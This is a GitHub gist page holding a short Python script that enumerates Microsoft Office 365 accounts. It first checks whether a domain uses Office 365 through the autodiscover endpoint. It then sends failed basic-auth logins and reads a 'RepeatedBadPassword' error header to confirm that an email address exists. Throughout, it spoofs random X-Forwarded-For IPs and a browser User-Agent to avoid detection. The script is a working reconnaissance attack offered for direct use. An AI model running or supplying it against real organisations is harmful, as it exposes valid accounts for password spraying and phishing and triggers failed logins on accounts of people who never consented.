Skip to content

Instantly share code, notes, and snippets.

@akhil-reni
Created September 14, 2022 06:10
Show Gist options
  • Save akhil-reni/9179af9e4868dd2df27c76b69611e02a to your computer and use it in GitHub Desktop.
Save akhil-reni/9179af9e4868dd2df27c76b69611e02a to your computer and use it in GitHub Desktop.
User enumeration for O365 users
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from ipaddress import IPv4Address
from random import getrandbits
import requests
logger = logging.getLogger()
def generate_random_ip():
bits = getrandbits(32)
addr = IPv4Address(bits)
return str(addr)
def check_office(domain):
headers = {
"X-Forwarded-For": generate_random_ip(),
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; "
"rv:75.0) Gecko/20100101 Firefox/75.0",
}
try:
r = requests.get(
"https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/x@{}?"
"Protocol=Autodiscoverv1".format(domain),
headers=headers,
timeout=10,
)
try:
x = r.json()
if "Protocol" in x:
return True
except:
pass
if "outlook.office365.com" in r.url:
return True
return False
except Exception as e:
logger.error(e)
return False
def enum_office(email):
headers = {
"X-Forwarded-For": generate_random_ip(),
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; "
"rv:75.0) Gecko/20100101 Firefox/75.0",
}
# request 1
random_password = generate_random_ip()
try:
requests.get(
"https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{}?"
"Protocol=Autodiscoverv1".format(email),
allow_redirects=False,
headers=headers,
auth=(email, random_password),
timeout=20,
)
except Exception as e:
logger.error(e)
# request 2
try:
r2 = requests.get(
"https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{}?"
"Protocol=Autodiscoverv1".format(email),
allow_redirects=False,
headers=headers,
auth=(email, random_password),
timeout=20,
)
except Exception as e:
r2 = None
logger.error(e)
# check if r1 and r2 are made and r2
if r2:
resp_headers = r2.headers
live_id_basic_auth = resp_headers.get("X-AutoDiscovery-Error", None)
if live_id_basic_auth:
if "RepeatedBadPassword" in live_id_basic_auth:
print(f"valid email {email}")
return email
print(f"Not a valid email {email}")
return False
enum_office("email to check")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment